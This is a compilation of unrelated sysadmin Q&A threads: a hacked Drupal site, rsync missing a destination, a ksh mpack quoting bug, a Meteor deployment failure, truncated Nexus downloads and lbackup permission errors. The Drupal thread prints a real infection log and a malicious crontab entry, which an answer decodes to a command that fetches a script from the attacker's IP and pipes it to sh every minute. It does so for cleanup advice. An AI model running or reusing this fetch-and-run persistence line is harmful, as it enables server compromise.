Drupal site hacked - drupal

apache server error_log:
--2018-11-14 22:13:39-- http://164.132.159.56/drupal/zps.sh
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 589 [text/x-sh]
Saving to: 'STDOUT'
0K 100% 101M=0s
2018-11-14 22:13:40 (101 MB/s) - written to stdout [589/589]
rm: cannot remove '/var/tmp/yum-ec2-user-_j9uM3': Operation not permitted
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/.'
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/..'
--2018-11-14 22:13:40-- http://164.132.159.56/drupal/2/olo
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33880 (33K)
Saving to: '/var/tmp/lew'
0K .......... .......... .......... ... 100% 286K=0.1s
2018-11-14 22:13:40 (286 KB/s) - '/var/tmp/lew' saved [33880/33880]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 33880 100 33880 0 0 96119 0 --:--:-- --:--:-- --:--:-- 96250
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
sh: line 1: 22417 Done echo '* * * * * echo -n "d2dldCAtTyAtIGh0dHA6Ly8xNjQuMTMyLjE1OS41Ni9kcnVwYWwvei5zaHxzaA==" | base64 -d |sh > /dev/null'
22418 Killed | crontab -
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
Can anyone suggest a solution?

Use the Hacked! module (https://www.drupal.org/project/hacked) on your site.
It will give you a report of all files that have been changed recently.
You can then delete those files or restore them from a known-clean copy of the code.
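For anyone triaging the same infection: the base64 string in the crontab line of the log decodes to a downloader that re-fetches the attacker's script every minute. Decoding it is safe (nothing is executed):

```shell
# Decode the payload from the malicious crontab entry seen in the log
payload='d2dldCAtTyAtIGh0dHA6Ly8xNjQuMTMyLjE1OS41Ni9kcnVwYWwvei5zaHxzaA=='
echo "$payload" | base64 -d
# wget -O - http://164.132.159.56/drupal/z.sh|sh
```

So besides cleaning the changed files, also inspect and clear the web server user's crontab (e.g. `crontab -l -u www-data`; the exact user name depends on your distribution), or the machine will re-infect itself within a minute.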


Rsync not transferring files and no errors

So I have files on the server that I'm trying to copy over. First I tried grabbing the whole folder with:
rsync -avzh --stats deploy@website.com:/data/deploy/website/releases/20200309193449/files
I even tried just getting a particular file with:
rsync -avz --stats deploy@website.com:/data/deploy/website/releases/20200309193449/files/28/ImportantFile.doc
The file is returning:
-rw-rw-r-- 48640 2020/04/08 15:13:42 ImportantFile.doc
Number of files: 1
Number of files transferred: 0
Total file size: 48640 bytes
Total transferred file size: 0 bytes
Literal data: 0 bytes
Matched data: 0 bytes
File list size: 79
File list generation time: 0.001 seconds
File list transfer time: 0.000 seconds
Total bytes sent: 16
Total bytes received: 103
By contrast, when I try to copy the folder, rsync reports the following permissions on it:
drwxrwxr-x 4096 2020/04/08 15:13:42 files
Am I missing something? Is there some additional permission I should be putting in the rsync?
Leaving this here in hopes that someone will benefit from my mistake. I was missing the destination argument; adding a space and a . at the end fixed it, like so:
rsync -avzh --stats deploy@website.com:/data/deploy/website/releases/20200309193449/files .
I hope this benefits someone eventually.

mpack command in ksh script, ftp file first from windows

WORK_FILE=RetriesExceeded.csv
MAIL="test@test.org"
HOST=lawsonfax
$FTP -v "$HOST" << EOF
get RetriesExceeded.csv
quit
EOF
archive_file $WORK_FILE
/law/bin/mpack -s 'Fax Retries Exceeded' "$WORK_FILE" "$MAIL"
log_stop
exit 0
Newest error at bottom, no such file or directory: [dgftp#lawapp2]/lawif/bin$ get_lawson_fax.ksh
Connected to lawsonfax.phsi.promedica.org.
220 Microsoft FTP Service
331 Password required for dgftp.
230 User logged in.
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
352 bytes received in 0.04171 seconds (8.242 Kbytes/s)
local: RetriesExceeded.csv remote: RetriesExceeded.csv
221 Goodbye.
RetriesExceeded.csv: No such file or directory
[dgftp#lawapp2]/lawif/bin$
The last command now:
CMD="/law/bin/mpack -s 'Fax Retries Exceeded' $WORK_FILE $MAIL"
Suggested change:
/law/bin/mpack -s 'Fax Retries Exceeded' "$WORK_FILE" "$MAIL"
Of course, this only works if the /law/bin/mpack program actually exists.
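The reason the CMD-variable form fails is a classic shell pitfall: quotes stored inside a variable are not re-parsed when the variable is expanded, so mpack would receive 'Fax (with a literal quote) as its subject. A small demonstration with echo standing in for mpack:

```shell
# Quotes inside a variable become literal characters on expansion
CMD="echo 'Fax Retries Exceeded'"
$CMD   # prints: 'Fax Retries Exceeded'  (wrong: literal quotes, three words)

# Calling the program directly keeps the subject as one argument
echo 'Fax Retries Exceeded'   # prints: Fax Retries Exceeded
```

That is why the suggested change calls mpack directly with quoted variables instead of going through $CMD.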

Meteor Error using npm-container package on deployment time

I am using Meteor version 1.2.1.
I want to use a Node.js package in Meteor, so I added the npm-container Meteor package.
But after adding this package to my Meteor project, I get the error below at deployment time (mup deploy).
[101.100.1.200] - Invoking deployment process
[101.100.1.200] x Invoking deployment process: FAILED
-----------------------------------STDERR-------------------------------
npm WARN package.json meteor-dev-bundle#0.0.0 No repository field.
npm WARN package.json meteor-dev-bundle#0.0.0 No README data
../src/coroutine.cc: In function `void* find_thread_id_key(void*)':
../src/coroutine.cc:64:53: warning: comparison of unsigned expression >=
0 is always true [-Wtype-limits]
for (pthread_key_t ii = coro_thread_key - 1; ii >= 0; --ii) {
^
../src/coroutine.cc:90:3: warning: `thread_id' may be used uninitialized
in this function [-Wmaybe-uninitialized]
if (tls == thread_id) {
^
js-bson: Failed to load c++ bson extension, using pure JS version
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
curl: (7) Failed to connect to localhost port 8456: Connection refused
Latest deployment failed! Reverted back to the previous version.
-----------------------------------STDOUT-------------------------------
lk#0.5.1 node_modules/chalk
escape-string-regexp#1.0.3 node_modules/escape-string-regexp
supports-color#0.2.0 node_modules/supports-color
has-ansi#0.1.0 node_modules/has-ansi
strip-ansi#0.3.0 node_modules/strip-ansi
eachline#2.3.3 node_modules/eachline
type-of#2.0.1 node_modules/type-of
amdefine#1.0.0 node_modules/amdefine
asap#2.0.3 node_modules/asap
underscore#1.5.2 node_modules/underscore
meteor-promise#0.5.0 node_modules/meteor-promise
promise#7.0.4 node_modules/promise
source-map-support#0.3.2 node_modules/source-map-support
semver#4.1.0 node_modules/semver
source-map#0.1.32 node_modules/source-map
fibers#1.0.5 node_modules/fibers
Waiting for MongoDB to initialize. (5 minutes)
{ [Error: Cannot find module '../build/Release/bson'] code: 'MODULE_NOT_FOUND' }
connected
Project-Name stop/waiting
Project-Name start/running, process 23426
Waiting for 100 seconds while app is booting up
Checking is app booted or not?
Project-Name stop/waiting
Project-Name start/running, process 25162

Unable to download large files from Sonatype Nexus

Nexus version 3.1.0-04
During a build, I receive the following error downloading an artifact from Nexus.
Download http://10.148.254.17:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.4.1/assertj-core-2.4.1.jar
:collection:extractIncludeTestProto FAILED
FAILURE: Build failed with an exception.
What went wrong:
Could not resolve all dependencies for configuration ':collection:testCompile'.
Could not download assertj-core.jar (org.assertj:assertj-core:2.4.1)
Could not get resource 'http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.4.1/assertj-core-2.4.1.jar'.
Premature end of Content-Length delimited message body (expected: 900718; received: 6862
This appears to be a problem with large files stored in Nexus.
If I try to download the file via wget or curl, it also fails.
c:>wget http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-core-2.5.0.jar
--13:57:06-- http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-core-2.5.0.jar
=> `assertj-core-2.5.0.jar'
Resolving proxy.xxxx.com... done.
Connecting to proxy.xxxx.com[xxx.xxx.xxx.xxx]:xxx... connected.
Proxy request sent, awaiting response... 200 OK
Length: 934,446 [application/java-archive]
0% [ ] 6,856 1.44K/s ETA 10:27
13:57:21 (1.44 KB/s) - Connection closed at byte 6856. Retrying.
c:>curl -O http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-core-2.5.0.jar
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 912k 0 6862 0 0 613 0 0:25:24 0:00:11 0:25:13 613
curl: (18) transfer closed with 927584 bytes remaining to read
Any ideas why?
In my case a docker layer download was being cut off. I solved this problem by increasing the timeout under System > HTTP > Connection/Socket timeout.

How does lbackup back up remote files with root privilege, and without root ssh login?

Well, I currently use lbackup to back up files on my remote server. So I logged in with my account, which is NOT root.
And I got the errors below; obviously, my account is NOT www-data.
Any suggestions?
$ ls -l /var/www/cache |grep cache
drwx------ 13 www-data www-data 4096 Jul 28 06:27 cache
Sun Jul 28 23:53:17 CST 2013
Hard Links Enabled
Synchronizing...
Creating Links
rsync: opendir "/var/www/bbs/cache" failed: Permission denied (13)
IO error encountered -- skipping file deletion
rsync: opendir "/var/www/bbs/files" failed: Permission denied (13)
rsync: opendir "/var/www/bbs/store" failed: Permission denied (13)
rsync: send_files failed to open "/var/www/bbs/config.php": Permission denied (13)
Number of files: 10048
Number of files transferred: 1919
Total file size: 202516431 bytes
Total transferred file size: 16200288 bytes
Literal data: 16200288 bytes
Matched data: 0 bytes
File list size: 242097
File list generation time: 0.002 seconds
File list transfer time: 0.000 seconds
Total bytes sent: 39231
Total bytes received: 5617302
sent 39231 bytes received 5617302 bytes 50731.24 bytes/sec
total size is 202516431 speedup is 35.80
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1536) [generator=3.0.9]
WARNING! : Data Transfer Interrupted
WARNING! : No mail configuration partner specified.
To specify a mail partner configuration file add the
following line into your backup configuration file :
mailconfigpartner=nameofyourmailpartner.conf
You have two possibilities:
a) ignore the files you cannot read (--exclude=PATTERN)
b) get read permissions for these files, either by logging in as another user or by chmod-ing the files, whichever is appropriate
